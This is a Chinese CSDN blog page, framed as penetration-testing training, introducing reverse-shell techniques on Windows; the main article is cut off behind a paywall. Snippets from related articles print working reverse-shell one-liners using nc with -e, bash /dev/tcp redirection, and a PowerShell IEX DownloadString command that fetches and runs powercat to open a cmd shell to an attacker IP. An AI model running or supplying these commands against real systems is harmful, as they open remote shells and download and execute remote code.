Windows的几种常用反弹shell方法

最新推荐文章于 2024-06-17 13:19:21 发布
最新推荐文章于 2024-06-17 13:19:21 发布
阅读量1.8w 收藏 32
点赞数 4
文章标签: windows web安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/123049915
版权
本文介绍了Windows环境下四种常用的反弹shell方法:nc、powershell、nishang TCP与UDP以及python。详细阐述了每种方法的执行步骤,包括攻击者监听、目标服务器上的命令执行以及验证shell是否反弹成功。
摘要由CSDN通过智能技术生成 
零基础学黑客,搜索公众号:白帽子左一

简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。

交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。

非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。

1.nc反弹shell

简介:nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具

第一步:开启nc监听,这里我直接使用了Kali自带的nc

图片

第二步:在目标服务器上使用nc工具,这个nc可以自己上传

图片

图片

第三步:查看监听端的nc,是否有sh

最低0.47元/天 解锁文章
zkzq
关注
  • 4
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
反弹cmd命令
12-06
反弹cmd命令
详解NC反弹shell几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
windows反弹shell方法
极客云曦前端
06-17 314
在这个例子中,攻击者的IP地址是192.168.1.17,端口是7777。首先说,正向shell是控制端主动连接被控制端,通过目标主机开放一个监听端口等待其他主机访问,从而获得对目标主机的shell访问,优点是控制端可以整个控制目标主机,但缺点会受到防火墙的连,等网络安全的限制。反向shell则是目标机器主动连接到攻击者的机器,通过在目标机器上执行操作访问攻击者的电脑建立的shell。简而言之,正向shell是攻击者主动出击,而反向shell则是目标机器主动反击,两者在网络环境的要求和安全性上有所不同。
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 2014
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
cmd反弹shell提权
10-24
cmd反弹shell提权
Windows反弹Shell
qq_62073002的博客
04-26 925
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2035
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
Windows 反弹shell方法
weixin_53747497的博客
07-12 2791
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
Windows 反弹 Shell
weixin_30414245的博客
08-03 543
NC 反弹 shell 攻击场景:   Victim IP: 192.168.2.10   Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cm...
反弹shell几种获取方式.docx
最新发布
08-19
一、反弹shell 二、python pty 方式 三、suid提权的方式 1、 suid权限的设置 2、 找出系统中具有suid权限的命令 3、 find提权 四、sessions的使用方法
Shell中字符串排序的几种方法
09-15
Shell脚本编程中,对字符串进行排序是一个常见的任务,特别是在处理文本文件、日志或者其他包含文本数据的场景。本文将详细介绍三种在Shell中对字符串进行排序的方法。 **方法一:按ASCII正向排序** 在Shell中,...
Shell脚本去重的几种方法实例
01-10
测试文件 代码如下: [root@bogon ~]# cat >test jason jason jason fffff jason 按 Ctr + D保存 1、sort -u 代码如下: [root@bogon ~]# sort -u test fffff jason 2、uniq 代码如下: [root@bogon ~]# uniq ...jason
Bash Shell 注释多行的几种方法
01-11
1、最简单方法 代码如下: :<<BLOCK ….注释内容 BLOCK 把输入重定义到前面的命令,但是 : 是空命令,所以就相当于注释了。 如果注释中有反引号的命令就会报错,反引号部分不会被注释掉,例如 var=`ls -l` 就...
python和shell变量互相传递的几种方法
12-25
python -> shell: 1.环境变量 复制代码 代码如下:import os var=123或var=’123′os.environ[‘var’]=str(var) #environ的键值必须是字符串 os.system(‘echo $var’)  复制代码 代码如下:import os ...
php反弹shell实现代码
10-30
它尝试使用多种不同的方法来执行命令,首先尝试`exec`,然后是`shell_exec`,接着是`system`,之后是`passthru`,如果都不行,则尝试`popen`。 3. `cf`函数用于将base64编码的字符串写入到文件中。这个函数先打开...
渗透测试-window反弹shell
lza20001103的博客
05-11 4525
window反弹shell
Window下的反弹shell
qq_58000413的博客
05-05 1215
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
window反弹shell
mingyqf的博客
02-16 1171
1.nc反弹shell 远程服务器 nc 监听命令 nc -vlnp 8080 受害者反弹 shell 命令,每种语言都有 sock 连接命令,可以根据不通过的环境,选择合适的命令。 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 2.powershell反弹cmd powercat是netcat的powershell版本 所以可以放在可被访问的远程服务器上。执行命令的时候,自动下载执行。 http://192.168.0.195/powercat
windows反弹shell方法
09-21
Windows反弹shell有多种方法,其中包括Powercat反弹shell、Nishang反弹shell和使用邮件地址作为反弹shell的服务器地址。 Powercat反弹shell是一种通过PowerShell实现的方法。攻击者可以在目标机器的cmd中执行命令,通过下载Powercat脚本并使用它来建立反弹shell连接。具体的命令如下: ```powershell powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1');powercat -c 192.168.110.128 -p 6677 -e cmd ``` Nishang反弹shell是另一种常用方法。它提供了一组用于渗透测试的PowerShell脚本,其中包括反弹shell的功能。攻击者可以使用Nishang脚本来建立反弹shell连接。 另外,还可以使用邮件地址作为反弹shell的服务器地址。这种方法适用于Windows系统,可以在编译时选择隐藏弹出窗口。具体实现的细节需要根据具体情况进行进一步研究。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值